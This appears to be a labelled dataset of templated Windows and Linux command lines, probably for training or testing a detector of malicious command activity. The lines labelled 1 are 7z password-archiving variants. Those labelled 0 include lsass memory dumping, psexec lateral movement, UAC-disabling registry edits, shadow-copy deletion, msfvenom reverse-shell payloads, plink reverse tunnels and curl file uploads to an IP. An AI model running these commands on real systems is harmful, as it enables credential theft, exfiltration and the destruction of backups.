1	7z a -p ${destination_file_path} ${source_file_path}
1	cmd /c "7z a -p ${destination_file_path} ${source_file_path}"
1	powershell -c "7z a -p ${destination_file_path} ${source_file_path}"
1	7z.exe a -p ${destination_file_path} ${source_file_path}
1	cmd /c "7z.exe a -p ${destination_file_path} ${source_file_path}"
1	powershell -c "7z.exe a -p ${destination_file_path} ${source_file_path}"
1	7z a ${destination_file_path} ${source_file_path} -p
1	cmd /c "7z a ${destination_file_path} ${source_file_path} -p"
1	powershell -c "7z a ${destination_file_path} ${source_file_path} -p"
1	7z.exe a ${destination_file_path} ${source_file_path} -p
1	cmd /c "7z.exe a ${destination_file_path} ${source_file_path} -p"
1	powershell -c "7z.exe a ${destination_file_path} ${source_file_path} -p"
1	7z a -p${password} ${destination_file_path} ${source_file_path}
1	cmd /c "7z a -p${password} ${destination_file_path} ${source_file_path}"
1	powershell -c "7z a -p${password} ${destination_file_path} ${source_file_path}"
1	7z.exe a -p${password} ${destination_file_path} ${source_file_path}
1	cmd /c "7z.exe a -p${password} ${destination_file_path} ${source_file_path}"
1	powershell -c "7z.exe a -p${password} ${destination_file_path} ${source_file_path}"
1	7z a ${destination_file_path} ${source_file_path} -p${password}
1	cmd /c "7z a ${destination_file_path} ${source_file_path} -p${password}"
1	powershell -c "7z a ${destination_file_path} ${source_file_path} -p${password}"
1	7z.exe a ${destination_file_path} ${source_file_path} -p${password}
1	cmd /c "7z.exe a ${destination_file_path} ${source_file_path} -p${password}"
1	powershell -c "7z.exe a ${destination_file_path} ${source_file_path} -p${password}"
1	7z a -slp -p ${destination_file_path} ${source_file_path}
1	cmd /c "7z a -slp -p ${destination_file_path} ${source_file_path}"
1	powershell -c "7z a -slp -p ${destination_file_path} ${source_file_path}"
1	7z.exe a -slp -p ${destination_file_path} ${source_file_path}
1	cmd /c "7z.exe a -slp -p ${destination_file_path} ${source_file_path}"
1	powershell -c "7z.exe a -slp -p ${destination_file_path} ${source_file_path}"
1	7z a -slp ${destination_file_path} ${source_file_path} -p
1	cmd /c "7z a -slp ${destination_file_path} ${source_file_path} -p"
1	powershell -c "7z a -slp ${destination_file_path} ${source_file_path} -p"
1	7z.exe a -slp ${destination_file_path} ${source_file_path} -p
1	cmd /c "7z.exe a -slp ${destination_file_path} ${source_file_path} -p"
1	powershell -c "7z.exe a -slp ${destination_file_path} ${source_file_path} -p"
1	7z a -slp -p${password} ${destination_file_path} ${source_file_path}
1	cmd /c "7z a -slp -p${password} ${destination_file_path} ${source_file_path}"
1	powershell -c "7z a -slp -p${password} ${destination_file_path} ${source_file_path}"
1	7z.exe a -slp -p${password} ${destination_file_path} ${source_file_path}
1	cmd /c "7z.exe a -slp -p${password} ${destination_file_path} ${source_file_path}"
1	powershell -c "7z.exe a -slp -p${password} ${destination_file_path} ${source_file_path}"
1	7z a -slp ${destination_file_path} ${source_file_path} -p${password}
1	cmd /c "7z a -slp ${destination_file_path} ${source_file_path} -p${password}"
1	powershell -c "7z a -slp ${destination_file_path} ${source_file_path} -p${password}"
1	7z.exe a -slp ${destination_file_path} ${source_file_path} -p${password}
1	cmd /c "7z.exe a -slp ${destination_file_path} ${source_file_path} -p${password}"
1	powershell -c "7z.exe a -slp ${destination_file_path} ${source_file_path} -p${password}"
1	7z a -slt -p ${destination_file_path} ${source_file_path}
1	cmd /c "7z a -slt -p ${destination_file_path} ${source_file_path}"
1	powershell -c "7z a -slt -p ${destination_file_path} ${source_file_path}"
1	7z.exe a -slt -p ${destination_file_path} ${source_file_path}
1	cmd /c "7z.exe a -slt -p ${destination_file_path} ${source_file_path}"
1	powershell -c "7z.exe a -slt -p ${destination_file_path} ${source_file_path}"
1	7z a -slt ${destination_file_path} ${source_file_path} -p
1	cmd /c "7z a -slt ${destination_file_path} ${source_file_path} -p"
1	powershell -c "7z a -slt ${destination_file_path} ${source_file_path} -p"
1	7z.exe a -slt ${destination_file_path} ${source_file_path} -p
1	cmd /c "7z.exe a -slt ${destination_file_path} ${source_file_path} -p"
1	powershell -c "7z.exe a -slt ${destination_file_path} ${source_file_path} -p"
1	7z a -slt -p${password} ${destination_file_path} ${source_file_path}
1	cmd /c "7z a -slt -p${password} ${destination_file_path} ${source_file_path}"
1	powershell -c "7z a -slt -p${password} ${destination_file_path} ${source_file_path}"
1	7z.exe a -slt -p${password} ${destination_file_path} ${source_file_path}
0	cmd /c "psexec \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d"
0	powershell -c "mstsc.exe /v:${ip_address} /f /restrictedAdmin"
0	cmd /c "psexec.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}"
0	powershell -c "Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d"
0	cmd /c "choco install -y putty"
0	powershell -c "Psexec64 \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute} -s"
0	choco install psexec
0	cmd /c "wmic.exe os get Version"
0	echo ${email_content} | sendmail ${username}@${domain} 2> /dev/null
0	powershell -c "procdump -accepteula -ma lsass.exe lsassdump.dmp"
0	reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD_LITTLE_ENDIAN /d 0 /f
0	cmd /c "Psexec64.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -s"
0	cmd /c "reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /t REG_SZ /f"
0	powershell -c "taskkill /F /IM ${process_name}"
0	curl -v -X POST -F file=@${source_file_path} http://${ip_address}:${port}/upload
0	echo ${email_content} | mail -s ${email_subject} ${username}@${domain} 2> error.log
0	powershell -c "certutil -encode -Unicode -gmt -v error.txt encode.txt"
0	powershell -c "wmic.exe os get FreePhysicalMemory"
0	mstsc.exe /v:${ip_address} /f /multimon
0	nmap -v -A ${ip_address} 2> &1
0	echo ${email_content} | sendmail ${username}@${domain} 2> &1
0	plink -ssh -l ${username} -pw ${password} -L 127.0.0.1:${local_port}:${ip_address}:${remote_port} -N
0	cmd /c "psexec.exe \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}"
0	echo ${email_content} | mpack -s ${email_subject} ${username}@${domain} 2> &1
0	plink -ssh -l ${username} -pw ${password} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port}
0	vssadmin delete shadows /all /quiet
0	cmd /c "sdelete -f ${local_file_path}"
0	cat email.txt | ssmtp ${username}@${domain} 2> /dev/null
0	nmap -PN ${ip_address} 2> /dev/null
0	nmap -A ${ip_address} 2> error.log
0	msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe
0	cmd /c "choco install winscp"
0	powershell -c "wmic.exe /node:${ip_address} shadowcopy call create Volume=C:"
0	ssmtp ${username}@${domain} < mail.txt
0	nmap -p- -sC -sV ${ip_address} 2> &1
0	powershell -c "reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /t REG_SZ /f"
0	cmd /c "sdelete -s -q ${loal_file_path}"
0	choco install -y 7zip
0	powershell -c "curl -X POST http://${ip_address}/upload -H -F files=@${source_file_path}"
0	cmd /c "certutil -encode -f ${source_file_path} ${destination_file_path}"
0	cmd /c "sc stop ${service_name}"
0	procdump.exe -accepteula -ma lsass.exe lsassdump.dmp
0	certutil -encode -Unicode -gmt -v error.txt encode.txt
0	cmd /c "ipconfig.exe /allcompartments /all"
0	powershell -c "taskkill /f /im ${process_name} /T"
0	sdelete -f -q ${local_file_path}
0	curl -X POST http://${ip_address}/upload -H -F 'files=@${source_file_path}'
0	sdelete -q -accepteula ${local_file_path}
0	powershell -c "msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe"
0	cmd /c "vssadmin Delete Shadows /All /quiet"
0	cmd /c "choco install -y winscp"
0	choco install -y winscp
0	nmap --open ${ip_address}
0	powershell -c "wmic.exe os get Caption"
0	taskkill.exe /f /im ${process_name} /T
0	cmd /c "netstat.exe -r"
0	powershell -c "vssadmin.exe delete shadows /All"
0	cmd /c "netstat -q"
0	powershell -c "reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /t REG_SZ /f"
0	cmd /c "plink.exe -ssh -l ${username} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port}"
0	ipconfig.exe /all
0	wmic shadowcopy call create Volume=C:
0	powershell -c "curl.exe -v -X POST http://${ip_address}/upload -F files=@${source_file_path}"
0	nmap --open ${ip_address} 2> /dev/null
